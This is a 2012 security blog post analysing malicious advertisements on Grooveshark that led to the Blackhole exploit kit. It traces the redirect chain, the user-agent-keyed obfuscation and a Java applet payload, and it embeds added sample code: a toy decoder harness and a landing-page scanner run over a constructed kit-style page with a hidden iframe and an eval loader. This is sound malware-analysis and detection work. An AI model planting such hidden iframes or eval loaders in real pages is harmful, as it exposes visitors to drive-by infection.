Thursday, August 30, 2012

Grooveshark Malvertisements

Grooveshark

Edit: I was able to get the full exploit code, but as with any exploit kit it's obfuscated to hell and back, so I have to deobfuscate it first.

A bunch of people use Grooveshark to listen to music. While this isn't the first time Grooveshark has served malvertisements, it's worth posting anyway. I wasn't able to get the malicious ad syndication to bounce me to the exploit page first-hand, and unfortunately the pcap data I have doesn't contain the exploits or malware.



The Malvertisement

If you're unfortunate enough to be served a malicious advertisement, scripts execute in the background, unbeknownst to you, that can redirect, enumerate, exploit, and infect. This malvertisement starts with a 302 redirect.


Next you'll get bounced to a body of obfuscated code that inserts a script on the page.


When formatted, it's easier to see what the script is doing. It's essentially using your user-agent string to decode the obfuscated script.


I had to hard-code the user-agent into the script and strip out some of the unnecessary HTML DOM handling to get the iframe it creates.
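The user-agent-keyed decoding and the analyst's workaround described above, as an added example that is not the ad's own script: a toy decoder that uses the UA string as its key, plus an offline harness that hard-codes the UA and swaps the DOM for a recorder so the iframe markup can be read off without a browser. The XOR scheme, the UA string, the payload and the example.invalid hostname are all constructed for illustration; the real ad script is not reproduced.

```javascript
// Added example, not the ad's own code: a toy model of a user-agent-keyed
// decoder and the offline harness an analyst uses to recover what it writes
// to the page. The XOR scheme, UA, payload and hostname are constructed.

// Constructed: the UA the decoder is keyed to. The analyst hard-codes it
// because nothing supplies navigator.userAgent outside a browser.
const HARDCODED_UA =
  'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1';

// Constructed: what the decoded script does once it runs in a browser.
const CLEAR_PAYLOAD =
  'document.write(\'<iframe src="http://example.invalid/land.php" width="1" height="1" style="visibility:hidden"></iframe>\');';

// Hex-encode text XORed with the UA. Used only to build the sample blob so the
// example is self-contained; decodeWithUa below is its inverse.
function encodeWithUa(text, ua) {
  let hex = '';
  for (let i = 0; i < text.length; i++) {
    const c = text.charCodeAt(i) ^ ua.charCodeAt(i % ua.length);
    hex += c.toString(16).padStart(2, '0');
  }
  return hex;
}

// Decoder: the UA is the key, so a different UA yields garbage, not script.
function decodeWithUa(hex, ua) {
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    const c = parseInt(hex.slice(i, i + 2), 16) ^ ua.charCodeAt((i / 2) % ua.length);
    out += String.fromCharCode(c);
  }
  return out;
}

const OBFUSCATED_BLOB = encodeWithUa(CLEAR_PAYLOAD, HARDCODED_UA);

// Analyst harness: decode with the hard-coded UA, then run the result against
// stand-in DOM objects so document.write is recorded rather than rendered.
// This is the "DOM stuff replaced" step; as in the post, it belongs on a VM.
function recoverInjectedMarkup(blob, ua) {
  const written = [];
  const fakeDocument = { write: (s) => written.push(s) };
  const fakeNavigator = { userAgent: ua };
  const decoded = decodeWithUa(blob, ua);
  try {
    new Function('document', 'navigator', 'window', decoded)(fakeDocument, fakeNavigator, {});
  } catch (e) {
    // Wrong key gives syntax garbage; report it instead of crashing.
    return { decoded, written, error: String(e) };
  }
  return { decoded, written, error: null };
}

// Pull iframe src attributes out of the captured markup for the report.
function iframeSources(markup) {
  const re = /<iframe[^>]*\ssrc=["']([^"']+)["']/gi;
  const srcs = [];
  let m;
  while ((m = re.exec(markup)) !== null) srcs.push(m[1]);
  return srcs;
}

console.log(iframeSources(recoverInjectedMarkup(OBFUSCATED_BLOB, HARDCODED_UA).written.join('')));
```

Run with `node`; the recorded `document.write` output is what the browser would have inserted, and the iframe source is what goes into the block list. Feeding the harness a different UA shows why the decoder is keyed: the output is no longer valid script and nothing is written.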


Continuation...

I was able to get the malvertisement on my VM, so I have the exploit code. The next request takes you to a page with an embedded 'loading' gif and another iframe redirecting to the actual exploit code. Interestingly, it also 'onbeforeunload's you to a Russian dating site. Maybe they own it and want some additional hits for monetary gain?



Here is a quick snippet of the exploit page code. It's obfuscated, obviously. It's ugly. Even when formatted it's ugly.


Actually, when formatted it isn't so bad. It's just a bunch of <pre> tags that hold the obfuscated code. Then, as exploit kits normally do, there is a small block of JavaScript that deobfuscates and eval()s the whole thing. Below you can see the body of the script. You can also see an applet at the very bottom: Set.jar. I was able to retrieve that Java archive. A lot of AV vendors detect it.
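Pulling together the landing-page traits described in the 'Continuation' section and here (a hidden iframe beside a 'loading' gif, an onbeforeunload handler, <pre> blocks of opaque text that a short script reads back and eval()s, an applet loading a .jar), here is an added detection example that is not part of the original post: a heuristic scanner run over a constructed page of that shape and over a benign page with an ordinary <pre>. Hostnames, the class name and the page contents are constructed; only the file name Set.jar comes from the post.

```javascript
// Added example, not from the original post: a heuristic scanner for the
// landing-page traits the post describes. Sample pages, hostnames and the
// applet class name are constructed; Set.jar is the name given in the post.

// Constructed sample page in the shape the post describes.
const KIT_PAGE =
  '<html><body onbeforeunload="window.location=\'http://dating.example.invalid/\'">' +
  '<img src="loading.gif">' +
  '<iframe src="http://kit.example.invalid/land.php" width="1" height="1" style="visibility:hidden"></iframe>' +
  '<pre>' + '0123456789abcdef'.repeat(8) + '</pre>' +
  '<pre>' + 'fedcba9876543210'.repeat(8) + '</pre>' +
  '<script>function dec(x){return x;}var p=document.getElementsByTagName("pre"),s="";' +
  'for(var i=0;i<p.length;i++){s+=p[i].innerHTML;}eval(dec(s));</script>' +
  '<applet code="Loader.class" archive="Set.jar" width="1" height="1"></applet>' +
  '</body></html>';

// Constructed benign page: a <pre> of ordinary source text and no eval.
const BENIGN_PAGE =
  '<html><body><h1>Snippet</h1><pre>int main(void) {\n  return 0;\n}</pre>' +
  '<script>document.getElementById("x");</script></body></html>';

// Shannon entropy in bits per character. Hex data sits near 4.0; a long run
// of one repeated character (padding, not payload) sits near 0.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// <pre> bodies that look like encoded data: long, no whitespace at all,
// and a spread of symbols. Source listings and prose contain whitespace.
function opaquePreBlocks(html) {
  const blocks = [];
  const re = /<pre[^>]*>([\s\S]*?)<\/pre>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const body = m[1];
    if (body.length >= 64 && !/\s/.test(body) && shannonEntropy(body) >= 3.0) blocks.push(body);
  }
  return blocks;
}

function scriptBlocks(html) {
  const out = [];
  const re = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Returns the indicators found, in a fixed order, plus any .jar names.
function scanLandingPage(html) {
  const findings = [];
  if (/<iframe[^>]*(?:width=["']?[01]["']?|height=["']?[01]["']?|visibility\s*:\s*hidden|display\s*:\s*none)/i.test(html)) {
    findings.push('hidden_iframe');
  }
  if (/\bonbeforeunload\s*=/i.test(html)) findings.push('onbeforeunload_handler');
  const opaque = opaquePreBlocks(html);
  if (opaque.length > 0) findings.push('opaque_pre_blocks');
  // The tell-tale decoder: a script that reads <pre> contents back and evals them.
  const decoder = scriptBlocks(html).some(
    (js) => /getElementsByTagName\(\s*["']pre["']\s*\)/i.test(js) && /\beval\s*\(/.test(js)
  );
  if (decoder) findings.push('pre_eval_decoder');
  const jars = [];
  const appletRe = /<applet[^>]*\barchive=["']([^"']+\.jar)["']/gi;
  let m;
  while ((m = appletRe.exec(html)) !== null) jars.push(m[1]);
  if (jars.length > 0) findings.push('applet_jar');
  return { findings, jars, opaquePreCount: opaque.length };
}

console.log(JSON.stringify(scanLandingPage(KIT_PAGE)));
console.log(JSON.stringify(scanLandingPage(BENIGN_PAGE)));
```

The checks are deliberately coarse; any one of them alone is weak, but a page that trips the <pre>-plus-eval decoder together with a hidden 1x1 iframe and an applet is worth pulling out of a proxy capture for a closer look, and the .jar name gives you the artifact to hash and submit.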



File: Set.jar
Size: 19713
MD5:  5F21D6629648633B42119AB73680C1D6

https://www.virustotal.com/file/8699be5447dd8ba5e530dac02310ac34fd6134d955dbf666804ec804bae3a170/analysis/


Still not done yet though... It's just Blackhole, but it might be one of the new versions equipped with that Java 0-day. It doesn't seem that way so far...


Summary

That's all I was able to entice their server to give me. All my other attempts got HTTP 500s. I may still be able to get the exploits/malware if I get lucky and get a malvertisement in my VMs.